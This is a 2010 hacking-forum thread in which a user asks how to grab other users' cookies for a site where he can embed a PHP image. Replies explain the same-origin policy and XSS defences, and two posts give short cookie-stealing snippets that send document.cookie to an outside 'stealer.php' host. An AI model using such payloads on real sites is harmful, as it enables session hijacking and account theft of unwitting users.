PHP Get Viewers' Cookies

Discuss the many weaknesses of browser security and ways to mitigate the threat

PHP Get Viewers' Cookies

Post by Dillxn on Mon Jul 05, 2010 8:11 pm
([msg=41312]see PHP Get Viewers' Cookies[/msg])

I am able to execute a PHP page from my server on another website (website B) in the form of an image.

I want to be able to get the cookies related to website B from any users of website B who happen across my PHP image.

For example, if website B stores a cookie in user X's browser, and then user X opens a page on website B that has my PHP image on it, I want the PHP page to be able to pull that cookie.

As far as I've tried, I have thus far been unable to accomplish this task; therefore I am unsure if this is even a feasible feat.

However, if anyone could assist me, I would greatly appreciate it. Thank you.
Dillxn
New User
New User
 
Posts: 3
Joined: Mon Jul 05, 2010 8:04 pm
Blog: View Blog (0)


Re: PHP Get Viewers' Cookies

Post by Bren2010 on Mon Jul 05, 2010 8:28 pm
([msg=41313]see Re: PHP Get Viewers' Cookies[/msg])

This is known as XSS, and/or cookie-stealing. However, to bad for you, a browser will only let a website access cookies that that website set. What you want to have done is possible with other means of XSS, just not the one your trying. ;)
User avatar
Bren2010
Poster
Poster
 
Posts: 340
Joined: Fri Sep 19, 2008 3:23 pm
Blog: View Blog (0)


Re: PHP Get Viewers' Cookies

Post by Dillxn on Tue Jul 06, 2010 10:51 pm
([msg=41379]see Re: PHP Get Viewers' Cookies[/msg])

Alright, before I go on a wild-goose-chase type trial-and-error session here, tell me if you think this would work (bearing in mind that XSS and most of "hacking" in general is all new to me).

I'll have the PHP page redirect the header location to a javascript url that extracts the page cookie and then opens another window with a page located on my server. The script will pass the extracted cookie to the page via querystring (and saves the data) and then the new window closes itself.

The concern I have here, is whether or not the redirect to the javascript url will occur within the image/php page or the actual root page.

So, what do you think?

And by the way, I do very much appreciate the help thus far and hopefully continued.
Dillxn
New User
New User
 
Posts: 3
Joined: Mon Jul 05, 2010 8:04 pm
Blog: View Blog (0)


Re: PHP Get Viewers' Cookies

Post by Bren2010 on Wed Jul 07, 2010 1:01 pm
([msg=41408]see Re: PHP Get Viewers' Cookies[/msg])

Dillxn wrote:Alright, before I go on a wild-goose-chase type trial-and-error session here, tell me if you think this would work (bearing in mind that XSS and most of "hacking" in general is all new to me).

I'll have the PHP page redirect the header location to a javascript url that extracts the page cookie and then opens another window with a page located on my server. The script will pass the extracted cookie to the page via querystring (and saves the data) and then the new window closes itself.

The concern I have here, is whether or not the redirect to the javascript url will occur within the image/php page or the actual root page.

So, what do you think?

And by the way, I do very much appreciate the help thus far and hopefully continued.


It seems kind of. . . over the top. Tbh, I'm just gonna say I didn't understand a thing you said. If this is still all happening in the image, the php header will redirect the image source to a different page, and then you have the same problem, just more complex. It seems so much easier to do:
Code: Select all
<script type="text/javascript">
document.getElementById('image').src='http://www.google.com/stealer.php?action=GO&cookies='+document.cookie;
</script>
<image src="http://www.google.com/stealer.php?action=waitForIt" id="image" />

With a method like this, all you have to do to disarm it is to use php's htmlspecialchars(), php's addslashes(), disable javascript, and newer browsers have XSS filters. Chances are whatever site it is going to be used on is going to use the first to, and your average user is going to have the last one.

Your welcome! :D I'm suprised your not getting trolled, actually. . .
User avatar
Bren2010
Poster
Poster
 
Posts: 340
Joined: Fri Sep 19, 2008 3:23 pm
Blog: View Blog (0)


Re: PHP Get Viewers' Cookies

Post by Dillxn on Wed Jul 07, 2010 4:27 pm
([msg=41411]see Re: PHP Get Viewers' Cookies[/msg])

Ah, well yeah if I could just post javascript to the page and think it would be executed then I would have tried that :P
So is that really my only option? I mean, it won't work, hence the question.

And, haha, yeah I am glad I'm not getting trolled. I'm trying to to be too vague or too specific (as in what site, et caetera) in my questions.
Dillxn
New User
New User
 
Posts: 3
Joined: Mon Jul 05, 2010 8:04 pm
Blog: View Blog (0)


Re: PHP Get Viewers' Cookies

Post by sanddbox on Wed Jul 07, 2010 9:31 pm
([msg=41417]see Re: PHP Get Viewers' Cookies[/msg])

If you want the cookies of a user browsing site A through your site B...it's not possible. Ever heard of the same origin policy? It basically says that you only send the cookies that belong to the site you're currently visiting.

@Bren - that solution won't work without an XSS vulnerability. It seems to me like the OP is trying to get the cookies of a user browsing a non-xss vulnerable page.

@OP - By the way - there are a few things you can get: the IP Address, User Agent, and HTTP Referer.
Image

HTS User Composition:
95% Male
4.98% Female
.01% Monica
.01% Goat
User avatar
sanddbox
Expert
Expert
 
Posts: 2337
Joined: Sat Jul 04, 2009 5:20 pm
Blog: View Blog (0)


Re: PHP Get Viewers' Cookies

Post by Bren2010 on Thu Jul 08, 2010 2:41 pm
([msg=41457]see Re: PHP Get Viewers' Cookies[/msg])

@sanddbox - Well then he's screwed, isn't he . . .?
User avatar
Bren2010
Poster
Poster
 
Posts: 340
Joined: Fri Sep 19, 2008 3:23 pm
Blog: View Blog (0)


Re: PHP Get Viewers' Cookies

Post by 0xBEEF1337 on Fri Jul 09, 2010 6:02 pm
([msg=41501]see Re: PHP Get Viewers' Cookies[/msg])

Delete.
Last edited by 0xBEEF1337 on Sat Jan 29, 2011 3:31 pm, edited 1 time in total.
0xBEEF1337
Experienced User
Experienced User
 
Posts: 75
Joined: Wed Jul 07, 2010 11:34 pm
Blog: View Blog (0)


Re: PHP Get Viewers' Cookies

Post by Bren2010 on Fri Jul 09, 2010 10:02 pm
([msg=41512]see Re: PHP Get Viewers' Cookies[/msg])

Like: [url=javascript:window.location='http://www.bren2010.com?lulz='+document.cookie]this[/url]?

-- Fri Jul 09, 2010 10:02 pm --

Shoot, it doesn't work.
User avatar
Bren2010
Poster
Poster
 
Posts: 340
Joined: Fri Sep 19, 2008 3:23 pm
Blog: View Blog (0)


Re: PHP Get Viewers' Cookies

Post by insomaniacal on Fri Jul 09, 2010 10:33 pm
([msg=41514]see Re: PHP Get Viewers' Cookies[/msg])

Unless my copypasta skills totally suck, copying that into your browser won't actually do anything.
It's not who votes that counts, it's who counts the votes
insomaniacal.blog.com
User avatar
insomaniacal
Addict
Addict
 
Posts: 1210
Joined: Sun May 24, 2009 10:21 am
Blog: View Blog (0)


Next

Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests